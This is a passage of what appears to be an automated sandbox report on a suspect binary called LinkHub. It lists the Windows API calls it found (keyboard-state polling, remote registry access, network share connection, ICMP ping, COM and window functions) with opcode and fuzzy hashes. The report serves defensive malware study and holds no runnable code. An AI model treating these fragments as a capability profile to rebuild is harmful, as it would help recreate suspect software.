  • Part of subcall function 00232D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0023DB51,?,00000000,?,00000000,?,0023DB78,?,00000007,?,?,0023DF75,?), ref: 00232D4E
  • Part of subcall function 00232D38: GetLastError.KERNEL32(?,?,0023DB51,?,00000000,?,00000000,?,0023DB78,?,00000007,?,?,0023DF75,?,?), ref: 00232D60
• _free.LIBCMT ref: 00233013
• _free.LIBCMT ref: 0023301E
• _free.LIBCMT ref: 00233029
• _free.LIBCMT ref: 00233034
• _free.LIBCMT ref: 0023303F
• _free.LIBCMT ref: 0023304A
• _free.LIBCMT ref: 00233055
• _free.LIBCMT ref: 00233060
• _free.LIBCMT ref: 0023306E
Strings
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID: &*
• API String ID: 776569668-4233420398
• Opcode ID: d63c66e2fb2495739caa675b92d441341ffb54ddb5ec6ab89bb25ea2b0a8770b
• Instruction ID: b3629e32830c30298e6a5588b78214bd20b49c7b846744deff8002c2dd49a19a
• Opcode Fuzzy Hash: d63c66e2fb2495739caa675b92d441341ffb54ddb5ec6ab89bb25ea2b0a8770b
• Instruction Fuzzy Hash: 0A1174B652010CEFCB01EF94DA42DDD3BA5EF05350F9145A5FA089B222DA31EA659F90
APIs
• GetKeyboardState.USER32(?), ref: 0026A9D9
• SetKeyboardState.USER32(?), ref: 0026AA44
• GetAsyncKeyState.USER32(000000A0), ref: 0026AA64
• GetKeyState.USER32(000000A0), ref: 0026AA7B
• GetAsyncKeyState.USER32(000000A1), ref: 0026AAAA
• GetKeyState.USER32(000000A1), ref: 0026AABB
• GetAsyncKeyState.USER32(00000011), ref: 0026AAE7
• GetKeyState.USER32(00000011), ref: 0026AAF5
• GetAsyncKeyState.USER32(00000012), ref: 0026AB1E
• GetKeyState.USER32(00000012), ref: 0026AB2C
• GetAsyncKeyState.USER32(0000005B), ref: 0026AB55
• GetKeyState.USER32(0000005B), ref: 0026AB63
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 0d275d48decc863384202f4c25042c05d10aa0307f4123da303adcec88f0aafb
• Instruction ID: e1e8042acf3f02f3cb2c568524b80f449cc0f04fa7e3d1e77de1b716afc368c5
• Opcode Fuzzy Hash: 0d275d48decc863384202f4c25042c05d10aa0307f4123da303adcec88f0aafb
• Instruction Fuzzy Hash: 4D510620A1478629FB31DFB48850BEABFB49F12344F08459AC5C26A1C2DA549FDCCF63
APIs
• GetDlgItem.USER32(?,00000001), ref: 00266649
• GetWindowRect.USER32(00000000,?), ref: 00266662
• MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 002666C0
• GetDlgItem.USER32(?,00000002), ref: 002666D0
• GetWindowRect.USER32(00000000,?), ref: 002666E2
• MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00266736
• GetDlgItem.USER32(?,000003E9), ref: 00266744
• GetWindowRect.USER32(00000000,?), ref: 00266756
• MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00266798
• GetDlgItem.USER32(?,000003EA), ref: 002667AB
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002667C1
• InvalidateRect.USER32(?,00000000,00000001), ref: 002667CE
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 8b797acd6145eac7fec7a59be504dcdf958b24efd4fa841789c1bc6a86cebb67
• Instruction ID: 2feecced9e2bc29089578396e0ec556ff67842d6811a37bc91569e4384df49c8
• Opcode Fuzzy Hash: 8b797acd6145eac7fec7a59be504dcdf958b24efd4fa841789c1bc6a86cebb67
• Instruction Fuzzy Hash: 75513371B10206AFDF18CFA8DD89AAEBBB9FB48315F108129F519E7290D7709D54CB50
                                                                                        APIs
                                                                                          • Part of subcall function 00202234: GetWindowLongW.USER32(?,000000EB), ref: 00202242
                                                                                        • GetSysColor.USER32(0000000F), ref: 00202152
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ColorLongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 259745315-0
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 002428D1
                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002428EA
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002428FA
                                                                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00242912
                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00242933
                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,002011F5,00000000,00000000,00000000,000000FF,00000000), ref: 00242942
                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0024295F
                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,002011F5,00000000,00000000,00000000,000000FF,00000000), ref: 0024296E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                        • String ID: (-
                                                                                        • API String ID: 1268354404-4239615555
                                                                                        APIs
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                          • Part of subcall function 002019CD: GetCursorPos.USER32(?), ref: 002019E1
                                                                                          • Part of subcall function 002019CD: ScreenToClient.USER32(00000000,?), ref: 002019FE
                                                                                          • Part of subcall function 002019CD: GetAsyncKeyState.USER32(00000001), ref: 00201A23
                                                                                          • Part of subcall function 002019CD: GetAsyncKeyState.USER32(00000002), ref: 00201A3D
                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 002995C7
                                                                                        • ImageList_EndDrag.COMCTL32 ref: 002995CD
                                                                                        • ReleaseCapture.USER32 ref: 002995D3
                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 0029966E
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00299681
                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0029975B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$(-$(-
                                                                                        • API String ID: 1924731296-987590486
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,00250D31,00000001,0000138C,00000001,00000001,00000001,?,0027EEAE,002D2430), ref: 0026A091
                                                                                        • LoadStringW.USER32(00000000,?,00250D31,00000001), ref: 0026A09A
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00250D31,00000001,0000138C,00000001,00000001,00000001,?,0027EEAE,002D2430,?), ref: 0026A0BC
                                                                                        • LoadStringW.USER32(00000000,?,00250D31,00000001), ref: 0026A0BF
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0026A1E0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString$Message_wcslen
                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                        • API String ID: 747408836-2268648507
                                                                                        APIs
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00261093
                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002610AF
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002610CB
                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002610F5
                                                                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0026111D
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00261128
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0026112D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                        • API String ID: 323675364-22481851
                                                                                        APIs
                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00294AD9
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00294AE0
                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00294AF3
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00294AFB
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00294B06
                                                                                        • DeleteDC.GDI32(00000000), ref: 00294B10
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00294B1A
                                                                                        • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00294B30
                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00294B3C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                        • String ID: static
                                                                                        • API String ID: 2559357485-2160076837
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 002846B9
                                                                                        • CoInitialize.OLE32(00000000), ref: 002846E7
                                                                                        • CoUninitialize.OLE32 ref: 002846F1
                                                                                        • _wcslen.LIBCMT ref: 0028478A
                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 0028480E
                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00284932
                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0028496B
                                                                                        • CoGetObject.OLE32(?,00000000,002A0B64,?), ref: 0028498A
                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 0028499D
                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00284A21
                                                                                        • VariantClear.OLEAUT32(?), ref: 00284A35
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 429561992-0
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00278538
                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002785D4
                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 002785E8
                                                                                        • CoCreateInstance.OLE32(002A0CD4,00000000,00000001,002C7E8C,?), ref: 00278634
                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002786B9
                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00278711
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0027879C
                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002787BF
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 002787C6
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 0027881B
                                                                                        • CoUninitialize.OLE32 ref: 00278821
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 2762341140-0
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0026039F
• SafeArrayAllocData.OLEAUT32(?), ref: 002603F8
• VariantInit.OLEAUT32(?), ref: 0026040A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 0026042A
• VariantCopy.OLEAUT32(?,?), ref: 0026047D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00260491
• VariantClear.OLEAUT32(?), ref: 002604A6
• SafeArrayDestroyData.OLEAUT32(?), ref: 002604B3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002604BC
• VariantClear.OLEAUT32(?), ref: 002604CE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002604D9
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
APIs
• GetKeyboardState.USER32(?), ref: 0026A65D
• GetAsyncKeyState.USER32(000000A0), ref: 0026A6DE
• GetKeyState.USER32(000000A0), ref: 0026A6F9
• GetAsyncKeyState.USER32(000000A1), ref: 0026A713
• GetKeyState.USER32(000000A1), ref: 0026A728
• GetAsyncKeyState.USER32(00000011), ref: 0026A740
• GetKeyState.USER32(00000011), ref: 0026A752
• GetAsyncKeyState.USER32(00000012), ref: 0026A76A
• GetKeyState.USER32(00000012), ref: 0026A77C
• GetAsyncKeyState.USER32(0000005B), ref: 0026A794
• GetKeyState.USER32(0000005B), ref: 0026A7A6
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00281019
• inet_addr.WSOCK32(?), ref: 00281079
• gethostbyname.WSOCK32(?), ref: 00281085
• IcmpCreateFile.IPHLPAPI ref: 00281093
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00281123
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00281142
• IcmpCloseHandle.IPHLPAPI(?), ref: 00281216
• WSACleanup.WSOCK32 ref: 0028121C
Strings
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
APIs
Strings
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: _wcslen$BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 707087890-567219261
APIs
• CoInitialize.OLE32 ref: 002841D1
• CoUninitialize.OLE32 ref: 002841DC
• CoCreateInstance.OLE32(?,00000000,00000017,002A0B44,?), ref: 00284236
• IIDFromString.OLE32(?,?), ref: 002842A9
• VariantInit.OLEAUT32(?), ref: 00284341
• VariantClear.OLEAUT32(?), ref: 00284393
Strings
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 636576611-1287834457
APIs
• GetLocalTime.KERNEL32(?), ref: 00278C9C
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00278CAC
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00278CB8
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00278D55
• SetCurrentDirectoryW.KERNEL32(?), ref: 00278D69
• SetCurrentDirectoryW.KERNEL32(?), ref: 00278D9B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00278DD1
• SetCurrentDirectoryW.KERNEL32(?), ref: 00278DDA
Strings
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local$System
• String ID: *.*
• API String ID: 1464919966-438819550
APIs
• CreateMenu.USER32 ref: 00294715
• SetMenu.USER32(?,00000000), ref: 00294724
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002947AC
• IsMenu.USER32(?), ref: 002947C0
• CreatePopupMenu.USER32 ref: 002947CA
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002947F7
• DrawMenuBar.USER32 ref: 002947FF
Strings
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup
• String ID: 0$F
• API String ID: 161812096-3044882817
APIs
  • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
  • Part of subcall function 002645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00264620
• SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 002628B1
• GetDlgCtrlID.USER32 ref: 002628BC
• GetParent.USER32 ref: 002628D8
• SendMessageW.USER32(00000000,?,00000111,?), ref: 002628DB
• GetDlgCtrlID.USER32(?), ref: 002628E4
• GetParent.USER32(?), ref: 002628F8
• SendMessageW.USER32(00000000,?,00000111,?), ref: 002628FB
Strings
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
• API String ID: 711023334-1403004172
                                                                                        • Opcode ID: 6f73b6f678453c2177090ba053ac5aa09481194cdec74f73c71efd6d2ef6b1b9
                                                                                        • Instruction ID: 9a47584900d9803b40aa895af4eab27bb12d591f3dbab9e7e5d6671ba28be4d8
                                                                                        • Opcode Fuzzy Hash: 6f73b6f678453c2177090ba053ac5aa09481194cdec74f73c71efd6d2ef6b1b9
                                                                                        • Instruction Fuzzy Hash: 0821C274D10218BBCF11AFA0DC89EEEBBB8EF0A350F10015AB951A72D1DB755868DF60
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                          • Part of subcall function 002645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00264620
                                                                                        • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00262990
                                                                                        • GetDlgCtrlID.USER32 ref: 0026299B
                                                                                        • GetParent.USER32 ref: 002629B7
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 002629BA
                                                                                        • GetDlgCtrlID.USER32(?), ref: 002629C3
                                                                                        • GetParent.USER32(?), ref: 002629D7
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 002629DA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 711023334-1403004172
                                                                                        • Opcode ID: a1396dd8b6a33eeed15bc0f079c8da5c6e400a0550c4c3f05883ab7e9c240ffd
                                                                                        • Instruction ID: ce6de759ec76f37e81f000fc569916e6866e04adc7b3a06478a83c29930323ea
                                                                                        • Opcode Fuzzy Hash: a1396dd8b6a33eeed15bc0f079c8da5c6e400a0550c4c3f05883ab7e9c240ffd
                                                                                        • Instruction Fuzzy Hash: 0E21C375D10218BBCF11AFA0DC89EEEBBB8EF05340F104156B991A7191CB755869EF60
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00294539
                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0029453C
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00294563
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00294586
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002945FE
                                                                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00294648
